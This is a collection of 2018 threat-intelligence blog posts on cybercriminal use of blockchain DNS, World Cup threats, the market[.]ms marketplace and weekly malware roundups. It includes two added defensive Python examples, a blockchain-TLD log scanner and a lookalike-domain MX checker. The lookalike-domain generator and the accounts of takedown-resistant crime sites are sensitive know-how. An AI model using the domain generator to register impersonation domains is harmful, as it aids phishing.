Rafael joined Digital Shadows in 2015 and works as a Senior Strategy and Research Analyst. He has written several articles and papers, and his research regularly features in the international press. His previous research areas include threats to the 2016 Rio Olympics, the 2017 WannaCry attacks, and how organisations and individuals can combat the spread of disinformation and fake news. Alongside Michael Marriott, he co-hosts and produces the Digital Shadows podcast, Shadow Talk. Rafael has a background in International Relations and Political Economy. See his blog posts here

How Cybercriminals are using Blockchain DNS: From the Market to the Bazar Tue, 12 Jun 2018 15:28:14 +0000 Since the takedowns of AlphaBay and Hansa in 2017, the cybercriminal community has been incorporating alternative technologies to improve both security and trust for those conducting illicit business online. Our latest report, Seize and Desist: The State of Cybercrime in the Post-AlphaBay and Hansa Age, looks at what technologies and processes have been the most popular. In this blog, we focus on one in particular, the use of blockchain DNS, which has seen steady, but not explosive, growth among cybercriminal users.  

What is Blockchain DNS?

Traditionally, when we type a website address into an Internet browser, the computer queries a DNS server for the corresponding IP address. Essentially, DNS is the Internet equivalent of a phone book. For example, if we browse to digitalshadows[.]com, the computer performs a lookup against a DNS server for the corresponding IP address. The final part of the domain (.com, .de, .uk, .org) is known as a Top Level Domain (TLD) and is controlled by a central authority such as the Internet Corporation for Assigned Names and Numbers (ICANN), Nominet or DENIC.

Blockchain DNS, on the other hand, is an example of a decentralized DNS. Blockchain TLDs – including .bit, .bazar and .coin – are not owned by a single central authority. Instead, name records are stored in a blockchain (.bit names on Namecoin; .bazar and .coin names on Emercoin) and replicated across that blockchain’s peer-to-peer network, and a client resolves them by reading the chain, or a copy of it served by a browser extension or dedicated resolver, rather than by sending a conventional DNS request.

Decentralized DNS offers benefits such as resisting censorship (for example, if a government orders all Internet Service Providers in a country to stop resolving certain domains to their IP addresses) and preventing DNS spoofing, where attackers insert corrupt DNS data so that a name server returns an incorrect IP address and redirects traffic to an attacker-controlled computer. However, decentralized DNS can also be abused by attackers for malicious purposes.
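From a defender’s side, the practical question is which hosts on your network are trying to resolve blockchain names at all. The example below is added here (it is not from the original post or from Digital Shadows) and scans a constructed resolver log for queries whose final label is a blockchain TLD, grouping the hits by client; the log format and every line in it are assumptions made for the example.

```python
"""Added example (not from the Digital Shadows post): find hosts that try to
resolve blockchain-DNS names through the ordinary corporate resolver.
The log format and every log line below are constructed for the example."""
import re
from collections import defaultdict
from typing import Dict, Iterable, List, Optional, Tuple

# Blockchain TLDs and the namespace that serves them. .bit lives on Namecoin;
# .bazar, .coin, .emc and .lib are Emercoin namespaces.
BLOCKCHAIN_TLDS: Dict[str, str] = {
    "bit": "Namecoin",
    "bazar": "Emercoin",
    "coin": "Emercoin",
    "emc": "Emercoin",
    "lib": "Emercoin",
}

# Assumed log layout: "<timestamp> <client-ip> <qname> <qtype> <rcode>".
LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<qname>\S+)\s+(?P<qtype>\S+)\s+(?P<rcode>\S+)$"
)


def classify(qname: str) -> Optional[str]:
    """Return the blockchain namespace for qname, or None for an ICANN name.

    Only the final label counts: foo.bit.example.com is an ordinary .com name,
    while WWW.EXAMPLE.BAZAR. (any case, trailing dot or not) is Emercoin.
    """
    labels = qname.rstrip(".").lower().split(".")
    return BLOCKCHAIN_TLDS.get(labels[-1])


def scan(lines: Iterable[str]) -> Dict[str, List[Tuple[str, str, str]]]:
    """Group blockchain-DNS queries by client: {client: [(qname, namespace, rcode)]}."""
    hits: Dict[str, List[Tuple[str, str, str]]] = defaultdict(list)
    for raw in lines:
        m = LINE_RE.match(raw.strip())
        if not m:
            continue  # skip malformed lines rather than fail the whole scan
        namespace = classify(m["qname"])
        if namespace:
            hits[m["client"]].append((m["qname"], namespace, m["rcode"]))
    return dict(hits)


# Constructed resolver log; addresses are from RFC 5737 documentation ranges.
SAMPLE_LOG = """\
2018-06-12T10:00:01Z 192.0.2.10 www.example.com A NOERROR
2018-06-12T10:00:05Z 192.0.2.10 shop.example.bazar A NXDOMAIN
2018-06-12T10:00:09Z 192.0.2.23 example.bit A NXDOMAIN
2018-06-12T10:00:12Z 192.0.2.23 mail.example.org MX NOERROR
2018-06-12T10:00:15Z 192.0.2.10 EXAMPLE.COIN. AAAA NXDOMAIN
2018-06-12T10:00:20Z 192.0.2.40 foo.bit.example.com A NOERROR
""".splitlines()

if __name__ == "__main__":
    for client, queries in scan(SAMPLE_LOG).items():
        for qname, namespace, rcode in queries:
            print(f"{client:12} {qname:24} {namespace:9} {rcode}")
```

Such queries only reach the corporate resolver from hosts without a working blockchain-DNS extension, because the extension resolves them out of band; an NXDOMAIN answer for a .bazar or .bit name is therefore a useful signal, but an empty result does not mean no one on the network is using these sites, so pair this check with egress monitoring.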

Experimenting with Decentralized DNS: Securing Your Stash

In July 2017, the Joker’s Stash, a popular Automated Vending Cart (AVC) site used to purchase stolen payment card details, began using blockchain DNS alongside its established Tor (.onion) domain. Users wanting to access the .bazar version of the site need to install a blockchain DNS browser extension or add-on.


Figure 1: Joker’s Stash .bazar domain

AVCs and other sites used to trade stolen account information have been experimenting with peer-to-peer DNS technology in order to hide malicious activity and, crucially, to bullet-proof their platforms. Joker’s Stash was not the first to experiment with decentralized DNS: a group known as The Money Team also created a .bazar domain back in January 2016, again in an attempt to better secure its operations. As blockchain domains have no central authority, and a registration is tied to a cryptographic key in the registrant’s wallet rather than to a name and postal address, it is harder for law enforcement to perform site takedowns.

OpenBazaar and Decentralized Marketplaces

Blockchain technology has also allowed users to realize alternative models for online marketplaces. The site known as Tralfamadore, for example, uses blockchain as its back-end to store the necessary databases and code to support front-end user interfaces. Transactions are made using cryptocurrency and recorded as smart contracts on the blockchain. This theoretically improves trust among users of the site as all transactions are permanently recorded, meaning that scam vendors can be more easily identified.

Another marketplace using blockchain technology is the site OpenBazaar. This project began in April 2016 and its userbase has increased steadily since then. In the first half of 2018, the number of new users on the site has risen by roughly 4,000, while the items for sale have gone up from 18,000 to over 27,000. Despite these gains, OpenBazaar has not been used for cybercriminal activity to any great extent, and the majority of items listed on the site would not be classed as illicit.


Figure 2: Number of OpenBazaar user and items since late-January 2018

Overall, support for decentralized marketplaces is at a nascent stage, and several barriers are still holding back wider adoption among the cybercriminal community. The main issue with blockchain-based platforms is that all interactions are publicly recorded, complicating private messaging between users. Users prefer more secure instant messaging services such as Jabber, which explains why cybercriminals in the post-AlphaBay and Hansa age have reverted to specialized forums where they can interact with buyers and sellers over Jabber, or directly to Telegram and Discord channels used to advertise everything from compromised accounts and stolen payment cards to counterfeit goods. The next blog in this series will look at these messaging platforms in greater depth.

If you can’t wait until then, download our report Seize and Desist: The State of Cybercrime in the Post-AlphaBay and Hansa Age to find out more on how cybercriminals are shifting away from the marketplace model towards alternative channels.



Shadow Talk Update – 06.11.2018 Mon, 11 Jun 2018 19:11:18 +0000 In Shadow Talk this week, Dr Richard Gold joins us to discuss the issue of security debt, a term used to refer to the accumulation of security risks over time, such as missed patches, misapplied configurations, mismanaged user accounts. Richard looks into how many of the attacks we see on a regular basis are actually a result of security risks that build up over time, and how security debt is a ticking time bomb for most organizations. In Part II, Harrison Van Riper covers the recent website defacement attack and data breach incident targeting the event ticketing company, Ticketfly.


Data breach and website defacement rock Ticketfly

Event ticketing company Ticketfly took all operations offline pending investigation into a website defacement attack and reported data breach. Ticketfly confirmed the data, which had been uploaded to a public server, was legitimate. The threat actor claiming responsibility has previously been associated with a hacktivist group known for conducting ideologically motivated defacement attacks. However, the attack on Ticketfly appears to be financially motivated since the attacker reportedly demanded payment from Ticketfly in return for disclosure of details regarding the exploitable vulnerability.


Group 123 target South Korean Naver users with new RAT variant

Distribution of a new remote access trojan (RAT) variant, NavRAT, has been attributed to the North Korean threat group known as Group 123. The group sent South Korean users phishing emails that referenced the upcoming United States–North Korea summit and carried a malicious Hangul Word Processor (HWP) document. NavRAT used the Naver email platform to communicate with its operators and exfiltrate data. Although abusing legitimate email platforms for this purpose is not a new tactic, this is the first observed campaign to use the popular Naver platform.


RIG exploit kit incorporates new remote code execution flaw

The RIG exploit kit has recently incorporated CVE-2018-8174, a vulnerability in the Windows VBScript engine. The vulnerability was originally identified as a zero-day exploit named “Double Kill”, with exploitation in the wild attributed to the espionage threat group DarkHotel. Its rapid incorporation into RIG, likely enabled by the recent release of proof-of-concept code on GitHub, exemplifies threat actors’ quick uptake of exploits that provide remote code execution, favored for their ability to compromise networks and devices. Microsoft has released a patch for this vulnerability.


North Korean threat group ceases attacks on United States energy sector

Covellite, an alleged North Korean threat group attributed with targeting entities in the energy sector, has reportedly ceased attacks against United States–based targets. While the reason for this was unconfirmed, the timing coincides with the United States and North Korean governments’ efforts to improve geopolitical relations. Covellite is a credible threat to the energy sector: it has continued to attack entities in other regions, including Europe and East Asia, and more attacks are considered likely in the short- to mid-term future (next six months).



Threats to the 2018 Football World Cup: Traditional Rules or a New Style of Play? Thu, 07 Jun 2018 16:47:12 +0000 The tension and excitement that precedes all global sporting events is beginning to build towards the start of this year’s Football World Cup in Russia. Levels of expectation will vary between nations, teams and fans alike; however, those concerned with the cyber-related risks surrounding sporting events may need to consider altering their defensive tactics.

Typical Cyber Threats to International Sporting Events

If trends at recent major sporting events tell us anything, it is that we should expect an array of offensive cyber activity during the World Cup this June. The attacks seen at this year’s Winter Games in PyeongChang fit the mould of activity previously witnessed on sport’s biggest stages. Threats typical of international sporting events include:

  • Phishing sites. Tournament-themed email lures are often used to trick victims into interacting with malicious emails. For instance, fake lottery win notifications and tickets have been combined with counterfeit partner websites to harvest credentials and scam football fans in the build-up to the event. Here, phishing sites and emails impersonating FIFA played a key role.

Attackers can also register domains impersonating the tournament brand or sponsors and use them to send phishing emails. Organizations and consumers should therefore look out for email addresses and websites that mimic official brands. For example, Digital Shadows detected the following domains that did not belong to the official organizers of the event: tbc-russia2018[.]ru, welcome2018[.]info, welcome2018[.]co, ioc2018[.]com and welcome2018[.]cn. Although not currently associated with a particular campaign, many of these domains had mail exchanger (MX) records, meaning they could be used in future phishing attacks to distribute malware or harvest credentials.

  • Hacktivist campaigns. Online activists, often with a political agenda, coordinate targeted attacks such as denial of service (DoS), website defacements and data leaks against the host nation and sponsors. Examples include OpSochi and OpOlympicHacking, two campaigns conducted by the Anonymous hacktivist group that targeted the Winter Olympics in Sochi and the Rio Summer Games respectively. The long-running OpRussia campaign has yet to target entities associated with the World Cup, but participants could realistically use the event as a platform to further protest against government censorship.


Figure 1: OpRussia defacement claim against Russian telecommunications company from May 2018

  • Disruptive malware – Seen most recently in PyeongChang earlier this year, where the ‘Olympic Destroyer’ malware sought to impede the opening ceremony.
  • Attacks on public Wi-Fi users – Tourists and high-value individuals traveling abroad have previously been targeted by attackers who take advantage of insecure public Wi-Fi connections. The suspected Russian state group APT28 used credentials stolen from hotel Wi-Fi networks to deliver remote access malware, steal information and move laterally across networks. According to Kaspersky, over a fifth of Wi-Fi hotspots in the 2018 World Cup host cities were unreliable, meaning traffic on them could be intercepted.
  • Fraud and financial crime – Previous major sporting events have seen a variety of tactics that exploit the large number of tourists visiting host cities. These include ATM skimming, banking scams and point-of-sale (PoS) malware infections used to steal payment card information.

The motivations for targeting the event are unlikely to change in Russia: large crowds and extensive media coverage offer similar rewards to those aiming for disruption or financial gain.
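One way to operationalize the impersonation-domain check described above, added here as example code rather than Digital Shadows’ own tooling: generate candidate lookalike domains from event keywords, then flag those that carry MX records, since a mail exchanger is the precondition for sending phishing mail from the domain. The keyword and affix lists, the table of MX answers and the placeholder mail hosts are constructed so the example runs offline; the `live_resolver` function (which assumes the dnspython package is installed) shows how the same check would run against real DNS.

```python
"""Added example, not Digital Shadows tooling: enumerate candidate
impersonation domains built from event keywords and flag those with MX
records. The resolver is passed in as a function so the example runs offline
against a constructed answer table; a live resolver using dnspython is
included for real use."""
import itertools
from typing import Callable, Dict, Iterable, List, Sequence, Tuple

Resolver = Callable[[str], List[str]]

# Keywords and affixes are constructed from the pattern of domains the post
# lists; extend them for a real engagement.
KEYWORDS = ("welcome2018", "russia2018", "ioc2018")
PREFIXES = ("", "tbc-", "fifa-", "tickets-")
TLDS = ("com", "ru", "info", "co", "cn")


def candidates(keywords: Sequence[str] = KEYWORDS,
               prefixes: Sequence[str] = PREFIXES,
               tlds: Sequence[str] = TLDS) -> List[str]:
    """Cartesian product of prefix, keyword and TLD, e.g. tbc-russia2018.ru."""
    return [f"{p}{k}.{t}" for p, k, t in itertools.product(prefixes, keywords, tlds)]


def find_mailable(domains: Iterable[str], resolve_mx: Resolver,
                  legitimate: Iterable[str] = ()) -> List[Tuple[str, List[str]]]:
    """Domains outside the legitimate allow-list that have at least one MX record."""
    allow = {d.lower().rstrip(".") for d in legitimate}
    found: List[Tuple[str, List[str]]] = []
    for d in domains:
        if d.lower() in allow:
            continue
        mx = resolve_mx(d)
        if mx:
            found.append((d, mx))
    return found


# Constructed answer table standing in for live DNS. The MX hostnames are
# placeholders and do not reflect real lookups against these domains.
FAKE_MX: Dict[str, List[str]] = {
    "tbc-russia2018.ru": ["mx.example.net."],
    "welcome2018.info": ["mx1.example.net.", "mx2.example.net."],
    "welcome2018.co": [],
}


def offline_resolver(domain: str) -> List[str]:
    """Offline stand-in for DNS: answers only from the constructed table."""
    return FAKE_MX.get(domain, [])


def live_resolver(domain: str) -> List[str]:
    """Real MX lookup with dnspython (pip install dnspython); not used offline."""
    import dns.exception
    import dns.resolver
    try:
        return [str(r.exchange) for r in dns.resolver.resolve(domain, "MX")]
    except dns.exception.DNSException:
        return []


if __name__ == "__main__":
    for domain, mx in find_mailable(candidates(), offline_resolver):
        print(f"{domain:24} MX -> {', '.join(mx)}")
```

Swap `offline_resolver` for `live_resolver` to run the check for real, and put the event’s genuine domains in `legitimate` so they are not reported; a domain with MX records and no campaign attached yet is exactly the kind of precursor worth watching.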

Changing Threat Landscape – New Style of Play

By and large, the traditional offensive techniques seen at previous sporting occasions have been focused on disrupting the event or profiting from those in attendance. The increasing use of Internet-connected technology throughout sport, however, could change the threat landscape in future. Advances in this area have undoubtedly expanded the opportunities available to athletes and spectators, but have also opened new avenues for risk. The result is a maturity of the threat landscape that can potentially damage the integrity of sport and add to spectator, sponsor and athlete safety concerns.

Sport in the Technology Era

Sport’s reliance on ‘smart’ technologies has increased year on year. The ‘Internet of Things’ (IoT) now stretches across athlete performance, spectator experience and the optimization of venue infrastructure. Data can be shared and accessed more easily through IoT devices such as the smart watches and tablets used by players and coaches; the same technology enhances a viewer’s experience through live stats and player tracking; and stadiums use ‘connected’ systems to control lighting, temperature and recovery facilities. The appeal of ‘smart’ stadiums has likely gone hand in hand with the growing demand for greater profits and prestige for the nations and sponsors that host the biggest sporting events, and their deployment is only set to continue.

At the turn of the year, stadiums in Russia were reportedly being fitted with ‘smart’ technology to keep pace with the infrastructure now expected at major sporting events. The extent to which these stadiums will be vulnerable as a result is somewhat unpredictable, but the risks are certainly present. Concerns are rightly raised around sports facilities and stadia, especially around the fire safety and access control functions that form part of the ‘connected’ infrastructure we often see at global events.

While we have yet to see attacks against critical safety systems at a major sporting tournament, the prospect is not far-fetched: if an aspiring threat group had the chance to manipulate these systems, there is a realistic possibility that it would, if doing so furthered its aims and objectives. If these types of attack are not realized now, they will become more likely as smart stadiums become the norm.

Bringing the Game Into Disrepute

The process of scoring, judging and reviewing decisions is another aspect of competitive sport that could be threatened via new attack vectors provided by the IoT. Central to the success of a World Cup or Olympic Games is the integrity of the results, which often relies on video replays or precise timing systems. This year’s tournament will be the first World Cup to make use of Video Assistant Referees (VAR), a procedure that has come under scrutiny during its trials across various leagues and competitions. Football already produces some of the most controversial situations in sport, meaning that any interference with VAR, or with any of the referee’s decisions, would likely have significant consequences for the integrity of the game and its reputation worldwide.

In Summary

Overall, this new style of play is likely to affect events of the future and would come as something of a surprise to those present in Russia this year. Traditional activity, such as phishing sites and World Cup-associated fraud, has already begun. If we are to see any activity exploiting IoT vulnerabilities, it is likely to be small in scale and less sophisticated; however, we can’t rule out the possibility that threat actors will use this year’s event to test their capabilities.

The 2020 Olympic Games in Tokyo is set to be one of the most ‘connected’ sporting events yet, utilizing smart systems throughout stadiums, public transport and the various sports to be played. While we may not yet see highly sophisticated attacks directed at these systems in Russia this year, their vulnerabilities may not go unexploited for long. The on-going opportunities these technologies supply are likely to be coupled with a variety of new risks that could endanger any industry that employs them. Sport will not be exempt from this.


To stay up to date with the latest Digital Shadows threat intelligence and news, subscribe to our threat intelligence emails here.

Heir to the AlphaBay and Hansa throne? Mon, 04 Jun 2018 20:20:26 +0000 It’s almost one year since the AlphaBay and Hansa dark web marketplace takedowns, also known as Operation Bayonet. Looking back, no single marketplace has managed to fill the AlphaBay-shaped gap left behind, at least among the English-speaking community. Existing sites such as Dream and Trade Route have failed to consolidate this empty space, hampered by a combination of poor communication by administrators and suspicion that these sites could be police honeypots like Hansa had been. Our latest report, Seize and Desist: The State of Cybercrime in the Post-AlphaBay and Hansa Age, looks at how the criminal ecosystem has developed.

This broad sense of fear and mistrust has also stymied new marketplaces. Without a strong reputation, new sites often struggle to get off the ground. And when they do, maintaining that trust and standing is difficult. We recently blogged on the rapid rise and fall of the Olympus marketplace, which tarnished a growing reputation in seconds after its administrator provoked the ire of its customer base by “hacking” a Reddit-style online community called Dread.

Introducing Marketplace 

One alternative that has been patiently developing in the background is market[.]ms, a marketplace run by founders of the prestigious Exploit[.]in hacking forum. Market[.]ms has been in development since 2015, and the current beta mode has a relatively small userbase (451 members and 79 items for sale according to the latest count).



Figure 1: market[.]ms homepage as it appears to registered users


Despite not being fully-developed, there are several reasons why this particular marketplace has better chances of succeeding than those that have gone before: 

  1. Street cred – Marketplaces live and die by their reputation, and Exploit[.]in holds good standing among both the Russian- and English-speaking cybercriminal communities. The site operates strict vetting and access restrictions, adding a greater sense of legitimacy for the goods and services being sold, and also easing some concerns regarding law enforcement operatives posing as normal users.
  2. Deep pockets – As well as overcoming trust issues, new markets have financial obstacles they need to hurdle. Setting up a new marketplace comes with a variety of hidden costs (a more in-depth discussion of the barriers to entry for new marketplaces will follow in a future blog) that include web development, bulletproof hosting services, bug bounty programs and customer support capabilities. As a well-established and highly popular forum, Exploit[.]in is in a stronger position than most to devote the necessary experience and financial resources to maintain a successful marketplace.
  3. Security and trust focused – Given the climate of fear and uncertainty, the developers of market[.]ms have gone to great lengths to demonstrate their dedication to security and privacy for their users. The site has a dedicated FAQ page for its security features, which includes providing “maximum anonymity”, using “encrypted servers”, carrying out “constant security tests” and “only [requiring] minimum data from users”. The site describes itself as an “automated safe trading platform”, providing the opportunity for “anyone” to buy and sell on a site with a built-in guarantor using Bitcoin. Funds can allegedly be withdrawn from the system easily, there is a guarantee that goods will be paid for, buyers can challenge low-quality goods, and buyers receive instant receipt or delivery of goods.

In a move that is being mirrored by many other forums, market[.]ms also has its own dedicated customer support and official Telegram channels. This is a trend that we’ve noticed more broadly across the criminal ecosystem, with users retreating from the marketplace model in favor of specialized forums operating chat channels on communication networks such as Telegram, Discord and Jabber.


Figure 2: Market[.]ms Telegram channel


  4. Cautious advertising – As well as taking steps to make their site more secure, the brains behind market[.]ms are also taking a guarded approach to online advertising. Rather than marketing the site as far and wide as possible – and potentially soliciting unwanted attention – the only publicly available references to the marketplace at this time are a post on Exploit[.]in with links to the site and a Pastebin page advertising the platform.
  5. Don’t do drugs kids – One of the main reasons why AlphaBay and Hansa became high-priority targets for law enforcement was the sale of illegal substances on the site, particularly fentanyl, which was associated with a large number of deaths worldwide. Market[.]ms, on the other hand, specifically focuses on digital goods such as databases, compromised accounts, malware, exploits, and counterfeit documents. The site also offers services such as VPN access, socks and proxies. While the sale of these goods will still be of concern to law enforcement, it’s likely that market[.]ms will be less of a priority for takedown operations in comparison to sites selling more high-profile items such as narcotics, weapons and abusive content.


Figure 3: Goods and services offered on market[.]ms

Success does not come overnight

While the creators of market[.]ms may be well-placed to succeed, the fact that the site has been in development since 2015 and is still only in beta mode demonstrates that creating and sustaining a prosperous marketplace takes time and can’t be rushed.

In our latest research report, Seize and Desist: The State of Cybercrime in the Post-AlphaBay and Hansa Age, we look at the impact that the AlphaBay and Hansa marketplaces have had on the criminal ecosystem. One year on, it appears as if the marketplace model is in decline, at least for the time being, with cybercriminals turning to alternative platforms and technologies to continue their operations. Market[.]ms may buck this trend, but in the post-AlphaBay age sites have to tread carefully in terms of not being too overt with their advertising, making it clear how they protect their users, while still facilitating enough transactions to remain financially viable.


To find out more on how cybercriminals are acclimatizing to this new environment, download our report: Seize and Desist: The State of Cybercrime in the Post-AlphaBay and Hansa Age.

Shadow Talk Update – 06.04.2018 Mon, 04 Jun 2018 14:12:25 +0000 In this week’s Shadow Talk, Dr Richard Gold joins us to discuss the return of the L0pht hackers. In 1998 the L0pht members testified at a cybersecurity hearing before the United States Senate, warning that any one person in their group could take down the Internet within 30 minutes. 20 years on, we look back on what has and hasn’t changed in the world of information security. In Part II, the team covers recent reporting on the use of military-style tactics such as war gaming and intelligence fusion centers in the financial services industry. We ask whether such tactics are effective, and whether smaller organizations can also employ the techniques being used by some of the world’s largest enterprises.


BackSwap malware switches bank transfer recipient

BackSwap deployed browser manipulation techniques against machines running Microsoft Windows to target Polish online banking users. The malware was delivered in spam campaigns with the “Nemucod” downloader attached, posing as modified versions of legitimate applications. Once installed, the malware used innovative techniques to identify user browsing activity and specific bank transfers by placing event hooks in the Windows message loop. Malicious JavaScript was then injected via the URL address field, swapping the intended transfer recipient details for those of attacker-controlled accounts. The technique works across multiple browsers and bypasses browser protection mechanisms. The campaign remains active, and BackSwap’s methods will likely be adopted by other banking malware developers.


Canadian banks’ customer data allegedly stolen

In two instances that are likely linked, threat actors reportedly informed the Bank of Montreal and Canadian Imperial Bank of Commerce subsidiary Simplii that they had obtained customer data through an undisclosed method. The legitimacy of the claims could not be independently verified, but statements from the affected banks suggested that the attackers had obtained credible data for up to 90,000 individuals. Some media outlets reportedly received notice of extortion demands against the financial institutions, although the banks did not confirm receiving such demands, and they may have been sent to the press by an unrelated, opportunistic threat actor. At the time of writing, no information on the TTPs used in any associated breach was available, nor was the date of any breach that may have occurred.


Chilean bank services disrupted by virus

Banco de Chile confirmed that an undisclosed virus had affected the bank’s networks on 24 May 2018. Reportedly, malware had infected workstations and other assets, thereby disrupting branch and telephone services. Social media posts, apparently made by Banco de Chile customers, also indicated service interruptions to Web platforms, and possible social engineering activity, such as phishing scams. However, the bank stated that customer accounts and transaction security had not been compromised. There have been no details of any TTPs reported, but, given Banco de Chile’s statements, the malware appeared to be disruptive, and could have been used to obscure other malicious activity. It is highly likely that more reporting will emerge in the short to medium term (one week to three months).


US-CERT reveals current Lazarus Group activity

The United States Computer Emergency Readiness Team (US-CERT) released an advisory detailing “HIDDEN COBRA” (aka Lazarus Group) malware that has reportedly been used since 2009. The advisory described “Joanap” (a backdoor trojan) and “Brambul” (a Server Message Block worm), which have been previously associated with the same threat group. US-CERT also highlighted new and ongoing activity associated with the group, including targeted sectors and geographies.

7 Ways The Digital Risk Revolution Changes Risk and Compliance – Webinar Key Insights Wed, 30 May 2018 15:13:35 +0000 Lockpath’s Vice President of Development Tony Rock and I recently conducted a webinar titled “7 Ways the Digital Risk Revolution Changes Risk and Compliance”. Tony is a cyber resiliency advocate who helps organizations assess breakthrough technologies and foster a culture of innovation while protecting intellectual property and managing enterprise risk. If you’re not familiar with Lockpath, their Keylight Platform integrates business processes to simplify risk management and regulatory compliance challenges. In this webinar, we discussed the digital risk trends and real-world enterprise challenges that create serious impacts from a governance, risk and compliance (GRC) perspective. Increased exposure points, things to protect, sophisticated attacks and regulations all create the perfect storm for digital risks and cyber threats.

The world is investing in digital technologies to access more innovative business models, making organizations more profitable, efficient or effective. This new digital domain, however, features new types of risks that didn’t exist before. Historically, enterprises built castle walls around their valuable “crown jewels”, be that customer PII (personally identifiable information), intellectual property or critical business operations. This perimeter has dissolved in the digital-by-default era. Organizations have supply chains that are more complex and longer than before, meaning we’re hyper-connected, with more data residing outside our company walls under limited visibility and less control. These gaps pose consequences for revenue, brand reputation and customer loyalty. You need fresh approaches to risk and compliance to understand and adapt to emerging cyber threats.

A few highlights from our webinar include:

1. Recognize Risks Beyond the Perimeter: The de-perimeterization of business due to mobile, cloud computing and an extended supply chain helps multiply risks outside of your organization. Digital risks include cyber threats, data exposure, brand exposure, third party risk, VIP exposure, physical threats and infrastructure exposure. Traditional perimeter-focused security solutions can’t comprehensively address these risks because the boundaries have disappeared. Protecting partner, customer and employee data is more difficult today. This greater attack surface poses challenges for organizations facing a shortage of security staff and skills in IT and security. This requires holistic approaches that consider people, processes and technology to increase visibility and compliance effectiveness.

2. Adopt Integrated Risk Management: Evolving into a digital business has truly transformed the business opportunity and competitiveness of many organizations. But organizations operate in silos and often lack communication and coordination. This accelerates enterprise risk and compliance gaps, to say nothing of wasted staff resources and time. I believe that all businesses are becoming digital enterprises with their “digital footprints” extending online into social media, the cloud and even the dark web. Integrated Risk Management (IRM) overcomes these organizational silos and takes a more holistic approach as Gartner’s John A. Wheeler states in his blog on “Seven Ways to Engage the Board on IRM”. The benefits of Integrated Risk Management include improved risk management and decreased time spent on governance and compliance.

3. Learn from Real-World Digital Risk Examples: Executives often ask how the exposures and breaches they read about in the media take place. I shared several scenarios during the webinar that outline how digital risks have negatively impacted organizations. The last World Cup match illustrates how Digital Shadows used digital monitoring to detect threats leading up to the global event. We monitor for digital footprints, the information that is projected, shared and created online by an organization. Attackers have digital footprints too that are detected for insight and context on cyber threats.

Digital Risk examples

If you turn this perspective to data loss, recent research in our white paper “Too Much Information” outlines how misconfigured cloud storage leaves 1.5 Billion files exposed globally on the Internet that threat actors could then exploit. Early detection of incidents reduces the cost to remediate.

4. Communicate the Importance of Digital Risk: Organizations that have historically been unaware of their digital risks now realize that they can no longer ignore them. There is real world evidence and case studies where financial and reputational damage has led to serious outcomes for organizations. Enhanced visibility and focus also help organizations allocate limited resources and better align security to organizational goals. Tony shared that an organization’s risk culture and security maturity can influence their likelihood to incorporate digital risk indicators into their operational processes. While adopting new technologies can pose digital risk management (DRM) challenges, security and information professionals can become more agile and adapt to the technology landscape and evolving cyber threat preparedness. As the Harvard Business Review states in “Boards Should Take Responsibility for Cybersecurity. Here’s How to Do It” (Curry, 2017):

Ideally, boards should eliminate obstacles that prevent organizations from developing a culture of proactive security. Without strong support from executive management and the board, companies are unlikely to develop strong cybersecurity practices. Directors should make sure that OpEx and CapEx are aligned with risk reduction priorities and projects; security is not done for security’s sake. It’s done for the business.

I’ve also seen that Integrated Risk Management is now being elevated as a board of directors-level initiative to establish cross-entity communication and resource investment. This welcomed executive involvement ensures a more strategic approach to risk management and security for all industry sectors, not just the highly regulated ones.

You can watch the webinar “7 Ways the Digital Risk Revolution Changes Risk and Compliance” to learn more about emerging threats and best practices to keep your business and reputation intact, reduce compliance complexity and mitigate digital risk going forward. Cyber security professionals must be responsive to the demands of agile digital-first businesses that lead our thriving economy.


To stay up to date with the latest Digital Shadows threat intelligence and news, subscribe to our threat intelligence emails here.

Shadow Talk Update – 05.29.2018 Tue, 29 May 2018 17:49:21 +0000 The focus in this week’s Shadow Talk is on “VPNFilter”, a modular malware with disruptive functionality that has targeted more than 500,000 network infrastructure devices across 54 countries. Recently the malware has been particularly active in targeting Ukraine. The team also covers new research on the TRITON malware targeting industrial control systems, changing techniques used by the Roaming Mantis malware family, and vulnerability updates related to VBScript and the Spectre/Meltdown attacks.


VPNFilter malware infects 500,000 devices

The multi-stage, modular malware VPNFilter has been associated with more than 500,000 infections on “small office home office” (SOHO) routers and network-attached storage (NAS) devices in 54 countries. Active since at least 2016, the malware has shown spikes in activity targeting Ukraine in May 2018. Initial entry is likely accomplished through default credentials and known vulnerabilities. The malware includes robust persistence and command and control (C2) mechanisms, plug-ins for C2 communication and traffic sniffing, as well as a “kill” function that can render a device inoperable. The FBI has since seized control of one C2 domain; however, it is a realistic possibility that attackers continue to control some non-rebooted devices. The activity was associated with the Russia-linked threat group “APT-28”, although this was not independently confirmed. Users should reboot and reset routers, as well as apply available patches.


XENOTIME threat actor attributed to TRISIS malware 

Security company Dragos published details of a threat actor named XENOTIME, which has been linked to attacks against industrial control systems (ICS). The group was associated with the TRISIS/TRITON malware, which targeted critical national infrastructure with disruptive intent. The group, currently active and operational since 2014, has expanded targeting from the Middle East to other geographies, including the United States. XENOTIME demonstrates in-depth knowledge of ICS, including those outside of the Schneider Electric Triconex system targeted by TRISIS malware. The group’s tactics, techniques and procedures (TTPs) included watering hole attacks, credential capture and reuse, and command line tools for lateral movement. The shift in target geography likely reflects updated operational objectives, and as this group is likely state-backed, activity will likely be influenced by inter-state political relationships.


Roaming Mantis malware family updates TTPs

The “Roaming Mantis” (aka Xloader, MoqHao) malware family has updated its TTPs and added target geographies. The malware’s developers had previously only deployed Android malware to capture banking credentials, first using SMS message phishing and then DNS spoofing to socially engineer victims into downloading malicious files. The financially motivated group has continued to use DNS redirection in attempts to deliver Android malware, Apple phishing pages and cryptocurrency mining scripts, using host pages in an additional 23 languages. It was not known how the group compromised DNS servers, but default credentials, brute-force cracking attacks or vulnerability exploitation could enable DNS device access.


Proof of concept (PoC) exploit codes published for VBScript vulnerability

Two working PoC exploit codes for CVE-2018-8174 were published to GitHub on 21 and 22 May 2018. This vulnerability affects the VBScript scripting engine, and can enable remote code execution if targeted through Internet Explorer. It was reportedly previously exploited in attacks attributed to the “DarkHotel” espionage group, and the recent release of public exploit code will likely result in widespread additional targeting. Although this vulnerability could be exploited through drive-by download attacks, it is more likely that attackers will use Word documents to deliver exploits, because a malicious Word file can force Internet Explorer to run and load the exploit code regardless of the default browser setting. Users should apply the patches released by Microsoft.


Additional Spectre/Meltdown microprocessor vulnerabilities reported

